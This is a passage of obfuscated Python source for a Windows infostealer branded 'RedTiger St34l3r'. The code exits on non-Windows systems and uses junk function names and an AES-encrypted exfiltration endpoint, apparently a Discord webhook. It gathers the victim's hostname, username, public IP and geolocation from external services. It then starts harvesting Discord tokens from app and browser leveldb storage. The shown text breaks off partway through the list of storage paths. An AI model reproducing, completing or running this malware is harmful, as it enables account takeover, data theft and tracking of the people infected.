
import sys

def NBJQRVSSZWAAEEWOJSDHJLGHACXIMULPBIFQOEIIQDZHGGOTECFLHTNBYHZAPYRCVTMIRGMNVUCWDNADGGTIHXISZGDKZHOMFBTV():
    def XXFTNIJVQSMWJYUPNDLZDYWNYVLGLDEBNLYYZLVNONKZVPWCAOKQSHGXLFFOWEWFWMOEDUYLKZ():
        if sys.platform.startswith("win"):
            return False
        else:
            return True
    
    try: 
        KOMXZQLDJJUWUGUBZXIZSNGOILEUFXWTQSMEOHIFXWELGLNIRFYQJFWCKSDYLADBYMRMSVSOZKMFIGYXRGGCAKHHPBI = XXFTNIJVQSMWJYUPNDLZDYWNYVLGLDEBNLYYZLVNONKZVPWCAOKQSHGXLFFOWEWFWMOEDUYLKZ()
        if KOMXZQLDJJUWUGUBZXIZSNGOILEUFXWTQSMEOHIFXWELGLNIRFYQJFWCKSDYLADBYMRMSVSOZKMFIGYXRGGCAKHHPBI == True:
            return KOMXZQLDJJUWUGUBZXIZSNGOILEUFXWTQSMEOHIFXWELGLNIRFYQJFWCKSDYLADBYMRMSVSOZKMFIGYXRGGCAKHHPBI
    except:
        return True
    
if NBJQRVSSZWAAEEWOJSDHJLGHACXIMULPBIFQOEIIQDZHGGOTECFLHTNBYHZAPYRCVTMIRGMNVUCWDNADGGTIHXISZGDKZHOMFBTV() == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import base64
import ctypes
import threading
import discord
from discord import SyncWebhook
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend

def GJKMFMULAFUWOEYTLLJVMRQDIUEYPENTZAJQRXGWAYRCYSPVBDNSLHMXYOTYIFATJNBZWEXQVPCJXCEACODBFUBVEFT(): pass
def WVLWKPSRBCZQQHYWJTJTEUIUZBTKCJSNCOBSAQKCJNDSKTAAABGWONUXXLUKLFMVZZKBVWIWJZHUJXBMBXTXFMV(): pass
def ATZNNITFXXZOHEHTRGUWBOXYSAAXAOCAIYXVHKSDBIUSEILWTIECP(): pass
def BPGSOQGHUMOIBDBCQTQFGTLKEKVSQSJFKZKIZKOCQGMARQWDPXTFDGRRYQKJDDISFSHASBWDGFFKN(): pass
def TBVTQIOJGPBIDXODNLCGHKROTXSNHZWUVMVFWAYVHBCLTQVGCGIAPLPBRQKWQCZIGHVTRFNQZGIGFSLSAK(): pass
def SPKNSYVZRSPBPXBVAAHDTFMXCJQTCIPXGFKRZZWKNFGOIXQJNDCQRBSBWJVVPKVICJFNLY(): pass
def WMPERYZYVRBUBAYIFSGLPZTRISGTXVDEAPYAPINQFYAXYGJXHBIHOQNSMWVJEOMWZYNQ(): pass
def BUSCFSXEFLTBAPOUDVNFGYTNFHRZVZSPERTDCCRUYITLMGOODFBWGODLGOYTJHZGPSBFSTICBWUFSKMRIJZBHSZTU(): pass
def BBJYOXOYPSAHEVJRBIPNFWRNCIKBUCVMLJVRBMJEDZASIKBMYCHEIHEVTXCGFTLLOGODICPYQSJPNOZS(): pass
def EXLXTNBHLQBSRPTPAWSVWLZUYXJXEVCKIMHNWGYJZAJYIBWHSRDJJFFIEZMCGZEMFMIJQ(): pass
def KJLUTYDKIZRJOFZUIKGAAVHYOUUMLRKRIFFUDVIOBCOFMKBCAUACSJASWBHXJURQQJNTRRXLPZAVRAGOKIJOSXOGP(): pass
def EKRSOZGHIFUTBWWFDBUCBHZBQKJVZBEHRNENWGOGEBJMIMBOJSFFVSDVBVDXCGUNOXDZUSFOGUKILIYHQBNYAMKPODHYNRTRCP(): pass
def XQPIZMYGVAAJBXNSDCHFLHMPSANTERBTKZPUBDBTPYOJZAQQDVDSYZNMRDWYTEDEXOCEZNGI(): pass
def RTPSQJXDSDZJVLYWVHZVNSNFZAYEHVROPIEPRERVOVJYMGZYXMYYLRPDZJOZW(): pass
def CWHKTIAHMKRTQNRVCQLBXQMFDUASRGRWWCXCKOXWJDOSOPIJOPFGMQZCOU(): pass
def PNYJCVNIRJBHFJUVEPLCKRXKTIOWDLKPYZAEFKSQQHPUBPJKVQBQWACCFWSPTEEWBBTZONOHTTCUSXQWWN(): pass
def PKFKZVAFLFZYZGGBAXAHGWGBBBYUWLHDLTTMQSTWSKDRKUNZGRRAIGCVMDNZEVUNJZYQIRPXVQGWBFVYQKMBGMQKFZMHH(): pass
def BYXZULZGZMRXLQXXNPWBJSATVLOWZNXFTCSRVNBEQHTVQFZUNPJSTXBBQGYIHORISABBHHDQDRMMRGUZDEJWOHKMLQMYPWYRTX(): pass
def CMICFRXCJFQURMMYCXOHTQIXMWILFGJHPDIKJOBKOBJHGCUADDFODJTWNLDPCZJIIQTJSSLFJXAPRSPWTA(): pass
def HMOAUSKRVAUNSPBAHDOXLPQECODDNDUNTCHMSLKZAGXODFPZRGO(): pass

def ZMJOGKYVRCDXMCPWNDFFVAUMNXCTWCVTQUTVCDQEVJONOEGLAZXBRYTDQRICRMNNKKPYZZPYFGZSGDPLHWSLNNI(w3bh00k_ur1, title=None, description=None):
    try:
        client = SyncWebhook.from_url(w3bh00k_ur1)
        embed = discord.Embed(
            title=title,
            description=description,
            color= NGLUJYSJXZOTXXDBAKUVBVOXGCYNSIBRYEESZCKAOOEUXMORETHAJCCOQQFQLGRGC
        )
        embed.set_footer(text=YMRAXQPHEMEVWZVXZRVGBBBTUJGIHKBIYOEBEXXJNDDCNGBTORDFJL, icon_url=QHIGPIOECKCAUBQNBRBAUXHQCKLCIVGTZLZKRAGDSLIJELBKYMMJHKRSCDQI)
        client.send(embed=embed, username=NFTJSAFNXOTVTSFOFZPFSWLFSRLVUVBXBDIMEBLWERLDQUMLTCLUWGWXRBTHSOOWGAHSUKLK, avatar_url=QHIGPIOECKCAUBQNBRBAUXHQCKLCIVGTZLZKRAGDSLIJELBKYMMJHKRSCDQI)
    except: pass

def XRHADDTNWNJPCHYNJJJIRZOWNRJEGDDMFITNLKVRHRQYUBGUQDINR(title):
    try:
        if sys.platform.startswith("win"):
            ctypes.windll.kernel32.SetConsoleTitleW(title)
        elif sys.platform.startswith("linux"):
            sys.stdout.write(f"\x1b]2;{title}\x07")
    except:
        pass
        
def MWJDKPIFTLPOBAKAURDWDHQTVXATDPLDZMKLYZMYQRXOPDIVQGSREAVPOUBPHMFDGQNOVHENQ():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def YFQQRDSYPPDRAAEXFHKTZBVORQDBETVZENSUQLTYUNZAGWVLAFZEFTSWGEVUSEATNOPUFTUQCOFHVUVKDTTNTQTDAAIQCNLG(FEOCAIZMFWAKLPRQXJIRKNIHZOYMCWUPJJEIWTEBRKYIGSHBJHYEYGFRRCICDPOZWMLRTJKXNPDKOEKUFUKBGYMBJXTCDJBFER, OYYNNOOGHGAHVRTJUAJXXLXILWBLKXYNDGPREZHBYKGBAZEPTCJHJGMZAHCRIRIE):
    def JSGIBAWQNNGZJAJLTEVMQLLVFCXTZLCENLZUQVVWYGGXIXDXVSAARETMEEZMGFYEELAHERUOGVONBJIHU(UEINBGHACSRKFVPLVCXZDORLXICXSJDHRVAZPVDVKYEWXUOCONKJRWVRBYKQHFLLSPTJLFMXREEZRQPYZBHCXPKZAAAQ, YXMWJGDHXGZMSFMZQQMTBMGKOZZBBSBSYRCHRJUXTDTCEKDVHJGPRXHQCCWEJCCPUCALMXDHOMYNGQQBA):
        WHGQAFKSJVDJAWLTINWWYHLCUQYWJZUUCJQEOHVVCFOZWJHFJR = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=YXMWJGDHXGZMSFMZQQMTBMGKOZZBBSBSYRCHRJUXTDTCEKDVHJGPRXHQCCWEJCCPUCALMXDHOMYNGQQBA, iterations=100000, backend=default_backend())
        if isinstance(UEINBGHACSRKFVPLVCXZDORLXICXSJDHRVAZPVDVKYEWXUOCONKJRWVRBYKQHFLLSPTJLFMXREEZRQPYZBHCXPKZAAAQ, str):  
            UEINBGHACSRKFVPLVCXZDORLXICXSJDHRVAZPVDVKYEWXUOCONKJRWVRBYKQHFLLSPTJLFMXREEZRQPYZBHCXPKZAAAQ = UEINBGHACSRKFVPLVCXZDORLXICXSJDHRVAZPVDVKYEWXUOCONKJRWVRBYKQHFLLSPTJLFMXREEZRQPYZBHCXPKZAAAQ.encode()  
        return WHGQAFKSJVDJAWLTINWWYHLCUQYWJZUUCJQEOHVVCFOZWJHFJR.derive(UEINBGHACSRKFVPLVCXZDORLXICXSJDHRVAZPVDVKYEWXUOCONKJRWVRBYKQHFLLSPTJLFMXREEZRQPYZBHCXPKZAAAQ)

    FEOCAIZMFWAKLPRQXJIRKNIHZOYMCWUPJJEIWTEBRKYIGSHBJHYEYGFRRCICDPOZWMLRTJKXNPDKOEKUFUKBGYMBJXTCDJBFER_data = base64.b64decode(FEOCAIZMFWAKLPRQXJIRKNIHZOYMCWUPJJEIWTEBRKYIGSHBJHYEYGFRRCICDPOZWMLRTJKXNPDKOEKUFUKBGYMBJXTCDJBFER)
    YXMWJGDHXGZMSFMZQQMTBMGKOZZBBSBSYRCHRJUXTDTCEKDVHJGPRXHQCCWEJCCPUCALMXDHOMYNGQQBA = FEOCAIZMFWAKLPRQXJIRKNIHZOYMCWUPJJEIWTEBRKYIGSHBJHYEYGFRRCICDPOZWMLRTJKXNPDKOEKUFUKBGYMBJXTCDJBFER_data[:16]
    ZNKOWOOHYBAZLYUNZLIPYIPVAODHEYPDHUTQWOMBUULIJCBVOQUQRZRSOBQMURWAHWTRVCAAXHONWLPZMYPTTXQTB = FEOCAIZMFWAKLPRQXJIRKNIHZOYMCWUPJJEIWTEBRKYIGSHBJHYEYGFRRCICDPOZWMLRTJKXNPDKOEKUFUKBGYMBJXTCDJBFER_data[16:32]
    FEOCAIZMFWAKLPRQXJIRKNIHZOYMCWUPJJEIWTEBRKYIGSHBJHYEYGFRRCICDPOZWMLRTJKXNPDKOEKUFUKBGYMBJXTCDJBFER_data = FEOCAIZMFWAKLPRQXJIRKNIHZOYMCWUPJJEIWTEBRKYIGSHBJHYEYGFRRCICDPOZWMLRTJKXNPDKOEKUFUKBGYMBJXTCDJBFER_data[32:]
    IXORANTXQJVNUOMSAGJWYZJOSIWPWHMVCOCMNSTUKGANRRMNWEBPSMMDILTZBELFFSG = JSGIBAWQNNGZJAJLTEVMQLLVFCXTZLCENLZUQVVWYGGXIXDXVSAARETMEEZMGFYEELAHERUOGVONBJIHU(OYYNNOOGHGAHVRTJUAJXXLXILWBLKXYNDGPREZHBYKGBAZEPTCJHJGMZAHCRIRIE, YXMWJGDHXGZMSFMZQQMTBMGKOZZBBSBSYRCHRJUXTDTCEKDVHJGPRXHQCCWEJCCPUCALMXDHOMYNGQQBA)
    YGQXVKVUXWGTPVJHGLUXGZRKCNSAHTVKEKHBNBMVHLRGKRTIVUCGRDVCCAGIVDFAYLENRHNVHMYEQAORGDRNLPAEEHSBK = Cipher(algorithms.AES(IXORANTXQJVNUOMSAGJWYZJOSIWPWHMVCOCMNSTUKGANRRMNWEBPSMMDILTZBELFFSG), modes.CBC(ZNKOWOOHYBAZLYUNZLIPYIPVAODHEYPDHUTQWOMBUULIJCBVOQUQRZRSOBQMURWAHWTRVCAAXHONWLPZMYPTTXQTB), backend=default_backend())
    ZDKAESCOTUFCZKKPZNODSNVICCSVYWBCJSJSKPTXJKNRJQUKXFXSDMAPV = YGQXVKVUXWGTPVJHGLUXGZRKCNSAHTVKEKHBNBMVHLRGKRTIVUCGRDVCCAGIVDFAYLENRHNVHMYEQAORGDRNLPAEEHSBK.decryptor()
    DOLHJBRYMREEQGEHPCXTPGQFATNIETARZEXDSYPASULYGGZZTNPCNSYQLFMLROA = ZDKAESCOTUFCZKKPZNODSNVICCSVYWBCJSJSKPTXJKNRJQUKXFXSDMAPV.update(FEOCAIZMFWAKLPRQXJIRKNIHZOYMCWUPJJEIWTEBRKYIGSHBJHYEYGFRRCICDPOZWMLRTJKXNPDKOEKUFUKBGYMBJXTCDJBFER_data) + ZDKAESCOTUFCZKKPZNODSNVICCSVYWBCJSJSKPTXJKNRJQUKXFXSDMAPV.finalize()
    THSGYHHUOGRNYLWYDJSZEUKOBJCOPTNHWGZAFEZWVAEEOBEPDCFIMBYVPETFSMFXOUQWULCRTJZBVXKINNULM = padding.PKCS7(128).unpadder()
    YCCSELAMCXXELRYZHITDGDSSKRCFHWQEPUHTCTPUKHEGIOAMTBDHGDCLOMGVAXWYROJVIRGNFITJZIATBFJRDGRY = THSGYHHUOGRNYLWYDJSZEUKOBJCOPTNHWGZAFEZWVAEEOBEPDCFIMBYVPETFSMFXOUQWULCRTJZBVXKINNULM.update(DOLHJBRYMREEQGEHPCXTPGQFATNIETARZEXDSYPASULYGGZZTNPCNSYQLFMLROA) + THSGYHHUOGRNYLWYDJSZEUKOBJCOPTNHWGZAFEZWVAEEOBEPDCFIMBYVPETFSMFXOUQWULCRTJZBVXKINNULM.finalize()
    return YCCSELAMCXXELRYZHITDGDSSKRCFHWQEPUHTCTPUKHEGIOAMTBDHGDCLOMGVAXWYROJVIRGNFITJZIATBFJRDGRY.decode()

XRHADDTNWNJPCHYNJJJIRZOWNRJEGDDMFITNLKVRHRQYUBGUQDINR("")

try: OXGFPDDRYBIXGRSQZGRLGQRTCSANLGQPVTSEBZYTKWTPQXBXEF    = socket.gethostname()
except: OXGFPDDRYBIXGRSQZGRLGQRTCSANLGQPVTSEBZYTKWTPQXBXEF = "None"

try: JDGREEAGWEBEWYOACVISGHBVNSCDMMULQJMUWCIRJKKSMFCFVSVVFECSOPZCKNJRYDMMCEA    = os.getlogin()
except: JDGREEAGWEBEWYOACVISGHBVNSCDMMULQJMUWCIRJKKSMFCFVSVVFECSOPZCKNJRYDMMCEA = "None"

try: WGMNDYQSQJHXPWOADCXPIDGKTVHGWXJHBVRPEUYSAQOSLHABEEQLMNKBOZFPTMWACAQACAJLYSEXOYZYPCSTYAC    = win32api.GetUserNameEx(win32api.NameDisplay)
except: WGMNDYQSQJHXPWOADCXPIDGKTVHGWXJHBVRPEUYSAQOSLHABEEQLMNKBOZFPTMWACAQACAJLYSEXOYZYPCSTYAC = "None"

try: NVBPSFFJDXXVRGXULOVZAYNIRFDRVYWSKRCVWOTBPWHKZJCQKOU    = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: NVBPSFFJDXXVRGXULOVZAYNIRFDRVYWSKRCVWOTBPWHKZJCQKOU = "None"

try: SWUJELIBBCKSPYIFOKGSMNHFVXIMWMFFUVULYBLUHJNVIHSIZCWQEKKODOPNZRQLNFNGSMKNPGI    = socket.gethostbyname(socket.gethostname())
except: SWUJELIBBCKSPYIFOKGSMNHFVXIMWMFFUVULYBLUHJNVIHSIZCWQEKKODOPNZRQLNFNGSMKNPGI = "None"

MTHGEGLAXGJJTJQWWYVMZFEYWYBXIJPAOEBOSOXQYLACLUXJEYUNOTTMLQOVOBNZBFTYUYXWKWOCMQAQ = r"""
sqbY4PsD1q4H71QKykjzk8p9dDB1gtfKUW6B9M2c9dVM9DQysFN9KWPH6umZg4bBaxm/r7oPThoCWy6G+mf/XNvdwG3mLjzXB9w8RairvqZ94hRk3D9Iia4k2Tm2KbSz94yQ5Izxe7uak4cBA7raSP6Gk+Yzhhs8pgkrN8D6jNYsyF5+C2O/AZErBZxB1vJJPhBZhUcOxBWeHlHWAMpoiw==
"""

HXFQXPABNQTTQWANKFNWMYIHKMCRZYJBEICQMDGYYJMXQRGLFYFTOIC            = "bLtDRSMatvFcOpIdYcSwNREkeUBNhmdTJoXBWsiWZoJkiJOItLcAumSefXCQtRKJaEFHdJuGciJUtRNaiaPKdIouEZHVZBUgtNVVjRINMpgLXnndWfDLQUrThksiHzlRNvsLGXCriHWZukrj"
JTGKWLVCNDPWWRXLRWYXMGURJZGRCKQZOYSRKPJBJVXVLGNVUMWBI        = "redtiger.shop"
NGLUJYSJXZOTXXDBAKUVBVOXGCYNSIBRYEESZCKAOOEUXMORETHAJCCOQQFQLGRGC    = 0xa80505
NFTJSAFNXOTVTSFOFZPFSWLFSRLVUVBXBDIMEBLWERLDQUMLTCLUWGWXRBTHSOOWGAHSUKLK = "RedTiger St34l3r"
QHIGPIOECKCAUBQNBRBAUXHQCKLCIVGTZLZKRAGDSLIJELBKYMMJHKRSCDQI   = "https://cdn.discordapp.com/attachments/1337898355279401023/1341890893858213908/RedTiger-Logo.png?ex=67b7a4c8&is=67b65348&hm=174ddbd80dd8570fa83779687def6eda441a7c12abd3765d970c1958ceeb1ec8&"
YMRAXQPHEMEVWZVXZRVGBBBTUJGIHKBIYOEBEXXJNDDCNGBTORDFJL    = "RedTiger St34l3r - github.com/loxy0dev/RedTiger-Tools"
YIAYXTGNUMMQYVJVTTJAATZONCWDGZTVXZOIYSDHUTPNNEDSKYZDLXOINXQQFZ   = {"text": YMRAXQPHEMEVWZVXZRVGBBBTUJGIHKBIYOEBEXXJNDDCNGBTORDFJL, "icon_url": QHIGPIOECKCAUBQNBRBAUXHQCKLCIVGTZLZKRAGDSLIJELBKYMMJHKRSCDQI}
QVIYKROFTLKFBPREUAZQHMCURAYNUQLAMCJOGJNSLSGAGTEUZLHEPCUTCROBJNSCUIFGHYVDDYBZUBITWQNLQE    = f'`{JDGREEAGWEBEWYOACVISGHBVNSCDMMULQJMUWCIRJKKSMFCFVSVVFECSOPZCKNJRYDMMCEA} "{NVBPSFFJDXXVRGXULOVZAYNIRFDRVYWSKRCVWOTBPWHKZJCQKOU}"`'
OCBONEYMJYIPCZOBAOSUJGABJJYGCPZKJZIXKBSLXRQZLCUMWFREFDUNVOCHFAVSSKFGRLGESEB    = YFQQRDSYPPDRAAEXFHKTZBVORQDBETVZENSUQLTYUNZAGWVLAFZEFTSWGEVUSEATNOPUFTUQCOFHVUVKDTTNTQTDAAIQCNLG(MTHGEGLAXGJJTJQWWYVMZFEYWYBXIJPAOEBOSOXQYLACLUXJEYUNOTTMLQOVOBNZBFTYUYXWKWOCMQAQ, HXFQXPABNQTTQWANKFNWMYIHKMCRZYJBEICQMDGYYJMXQRGLFYFTOIC)

UEUIKKJSCCMELLLZHNXISUXBGYCFLAVGCOLYWHCNFEUXATFIRSSQJDUHFZTDZSHRYWRXLTUXPCMWJXSNYD         = os.getenv("WINDIR", None).replace(" ", "%20")
EQBZBAEBELLJAVXDCCWLYITBRIFHDTWGPUITKBVJLEAOMTRQZAV     = os.getenv('USERPROFILE', None).replace(" ", "%20")
BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD   = os.getenv('LOCALAPPDATA', None).replace(" ", "%20")
IRUOINVNARWJZJLRZLMRJUGAUZIXYUBVQJWPRHYXHOQPSIEOTUQDIENZVISPNQPHHGLIHXMYGCVX = os.getenv('APPDATA', None).replace(" ", "%20")

try:
    NIWKYGZAVPSGPFKTXMVACTDLASVELANWAPOHBZFAFKWBUVCVNEKOHPHALXXLUHUAGMDVBQZWPLZMKKVUN = requests.get(f"https://{JTGKWLVCNDPWWRXLRWYXMGURJZGRCKQZOYSRKPJBJVXVLGNVUMWBI}/api/ip/ip={NVBPSFFJDXXVRGXULOVZAYNIRFDRVYWSKRCVWOTBPWHKZJCQKOU}")
    SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX = NIWKYGZAVPSGPFKTXMVACTDLASVELANWAPOHBZFAFKWBUVCVNEKOHPHALXXLUHUAGMDVBQZWPLZMKKVUN.json()

    NBBJJYGWGHEKGETVXJFJZVPCNISIKMCOJBKSCNXSIUPLUFXBVULLBTTNVVELPGRHNPCX = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('country', "None")
    NBBJJYGWGHEKGETVXJFJZVPCNISIKMCOJBKSCNXSIUPLUFXBVULLBTTNVVELPGRHNPCX_code = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('country_code', "None")
    QPUIUVYHTKCGYHZNCMTOQRLYMXQEWMWVUMFGBZBNBJIAOVHNPNXCFNINEGPEAKXKIOAPKVYCRCIQ = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('region', "None")
    QPUIUVYHTKCGYHZNCMTOQRLYMXQEWMWVUMFGBZBNBJIAOVHNPNXCFNINEGPEAKXKIOAPKVYCRCIQ_code = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('region_code', "None")
    PLUOFJKVQBFZYVCJQGCHMZTEEYZFWMTTZNMEBEMIBPDVIMJKONAANTDDCMPZURXHRTDFGABJZGJKULHHQKXCTL = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('zip', "None")
    OXICMXCUNIALABZCGAXMXVNQRQUHYHLRETNOJGUVQFZLBQIJHBCFSJFFRVQUPIRFBZPFWT = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('city', "None")
    NILUPURMGIRDCPGCIHREOUVLGJSXYPAWBWUEJUXZPYNICILSROIKBQ = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('latitude', "None")
    WGRTHTJGUSPFEQAQGDGQLYLVWUPDWHPDLMXOBNCCFRBQWDDEPBEHLCNCLFWJAQTXOYMPSKHNVUNMSEKQDS = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('longitude', "None")
    VXRJQWIHVFTNCLDYALMMDANMUWSNARPAWOCMHHWXOSREQEYRIFQADMSKJMIHWGEXXNLAIYQNYGYSITLQHOZGAPYPWAFVG = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('timezone', "None")
    WLLARDCVOQZIMCIRSRUMANZIKHCJNPOYNNXXYGWYJTCUWDNNDFBYTIWZRLTPQ = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('isp', "None")
    AEVXZTYFBSQANNPAHDBCMEYCDHDDWUJFZXSSHRKTEYDTEFQPHGTOJHQXMLMVGLDDXGWXLMUTMECRORTFSBI = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('org', "None")
    FIMCLHBUIVKZNOZGOGOINMVTPDFWFWWYRVDUFXTBYXMMNVECRWVXKHPRQIIWZCEJXTFNXJYARUJXLH = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('as', "None")
except:
    NIWKYGZAVPSGPFKTXMVACTDLASVELANWAPOHBZFAFKWBUVCVNEKOHPHALXXLUHUAGMDVBQZWPLZMKKVUN = requests.get(f"http://ip-api.com/json/{NVBPSFFJDXXVRGXULOVZAYNIRFDRVYWSKRCVWOTBPWHKZJCQKOU}")
    SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX = NIWKYGZAVPSGPFKTXMVACTDLASVELANWAPOHBZFAFKWBUVCVNEKOHPHALXXLUHUAGMDVBQZWPLZMKKVUN.json()

    NBBJJYGWGHEKGETVXJFJZVPCNISIKMCOJBKSCNXSIUPLUFXBVULLBTTNVVELPGRHNPCX = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('country', "None")
    NBBJJYGWGHEKGETVXJFJZVPCNISIKMCOJBKSCNXSIUPLUFXBVULLBTTNVVELPGRHNPCX_code = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('countryCode', "None")
    QPUIUVYHTKCGYHZNCMTOQRLYMXQEWMWVUMFGBZBNBJIAOVHNPNXCFNINEGPEAKXKIOAPKVYCRCIQ = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('regionName', "None")
    QPUIUVYHTKCGYHZNCMTOQRLYMXQEWMWVUMFGBZBNBJIAOVHNPNXCFNINEGPEAKXKIOAPKVYCRCIQ_code = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('region', "None")
    PLUOFJKVQBFZYVCJQGCHMZTEEYZFWMTTZNMEBEMIBPDVIMJKONAANTDDCMPZURXHRTDFGABJZGJKULHHQKXCTL = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('zip', "None")
    OXICMXCUNIALABZCGAXMXVNQRQUHYHLRETNOJGUVQFZLBQIJHBCFSJFFRVQUPIRFBZPFWT = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('city', "None")
    NILUPURMGIRDCPGCIHREOUVLGJSXYPAWBWUEJUXZPYNICILSROIKBQ = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('lat', "None")
    WGRTHTJGUSPFEQAQGDGQLYLVWUPDWHPDLMXOBNCCFRBQWDDEPBEHLCNCLFWJAQTXOYMPSKHNVUNMSEKQDS = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('lon', "None")
    VXRJQWIHVFTNCLDYALMMDANMUWSNARPAWOCMHHWXOSREQEYRIFQADMSKJMIHWGEXXNLAIYQNYGYSITLQHOZGAPYPWAFVG = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('timezone', "None")
    WLLARDCVOQZIMCIRSRUMANZIKHCJNPOYNNXXYGWYJTCUWDNNDFBYTIWZRLTPQ = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('isp', "None")
    AEVXZTYFBSQANNPAHDBCMEYCDHDDWUJFZXSSHRKTEYDTEFQPHGTOJHQXMLMVGLDDXGWXLMUTMECRORTFSBI = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('org', "None")
    FIMCLHBUIVKZNOZGOGOINMVTPDFWFWWYRVDUFXTBYXMMNVECRWVXKHPRQIIWZCEJXTFNXJYARUJXLH = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('as', "None")

def KJLUTYDKIZRJOFZUIKGAAVHYOUUMLRKRIFFUDVIOBCOFMKBCAUACSJASWBHXJURQQJNTRRXLPZAVRAGOKIJOSXOGP():
    import os
    import re
    import json
    import base64
    import requests
    from Cryptodome.Cipher import AES
    from win32crypt import CryptUnprotectData
    from discord import SyncWebhook, Embed

    def PHHTFKTFLAIIZOKNOOOTECZUKEGJJIWSWRXSPTYFHPBXGTESCCJMKXRL():
        FDVZOUZYCWBGIOVUIHRTODKMKWZVEUZELMGZRCTWYHVAABZLENWLQBCDPIBDJLHWLOPYFL = "https://discord.com/api/v9/users/@me"
        RZKLASSTMTXPWAOTLDVKSNPYXBCEZGXTIDOELBINUVWIGANJQSDEEKHFXQTU = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        RZKLASSTMTXPWAOTLDVKSNPYXBCEZGXTIDOELBINUVWIGANJQSDEEKHFXQTU_enc = r"dQw4w9WgXcQ:[^\"]*"
        RGNHUJYTGGQRRXWZKFXDUDDQSEJKXSQMXPEYRENVPLPGVMZDVWFAZKAOKVONTMZHUHQWSYUAU = []
        KOOUJVSZNYCEPDYXHAVOBWJUOTTCANGUGFJKFPHNBVYAGFLBQIVZZALNWPJ = []
        HJDPHHIJOSCRFHRTYRPGWHRNXZJXAQKBFIDRZYDWWWTJHSRYERQXFRFFHILOIZCGDDDCAIGAJMQUQQKRTDFSFXG = {}

        SYDOLIBBKNXKZENRXNWYXHRARDHTOASQRJMBUXIEOLTWAWUWXEMHLMRCLVOALSNOAOYE = {
            'Discord': IRUOINVNARWJZJLRZLMRJUGAUZIXYUBVQJWPRHYXHOQPSIEOTUQDIENZVISPNQPHHGLIHXMYGCVX + '\\discord\\Local Storage\\leveldb\\',
            'Discord Canary': IRUOINVNARWJZJLRZLMRJUGAUZIXYUBVQJWPRHYXHOQPSIEOTUQDIENZVISPNQPHHGLIHXMYGCVX + '\\discordcanary\\Local Storage\\leveldb\\',
            'Lightcord': IRUOINVNARWJZJLRZLMRJUGAUZIXYUBVQJWPRHYXHOQPSIEOTUQDIENZVISPNQPHHGLIHXMYGCVX + '\\Lightcord\\Local Storage\\leveldb\\',
            'Discord PTB': IRUOINVNARWJZJLRZLMRJUGAUZIXYUBVQJWPRHYXHOQPSIEOTUQDIENZVISPNQPHHGLIHXMYGCVX + '\\discordptb\\Local Storage\\leveldb\\',
            'Opera': IRUOINVNARWJZJLRZLMRJUGAUZIXYUBVQJWPRHYXHOQPSIEOTUQDIENZVISPNQPHHGLIHXMYGCVX + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
            'Opera GX': IRUOINVNARWJZJLRZLMRJUGAUZIXYUBVQJWPRHYXHOQPSIEOTUQDIENZVISPNQPHHGLIHXMYGCVX + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
            'Amigo': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
            'Torch': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Torch\\User Data\\Local Storage\\leveldb\\',
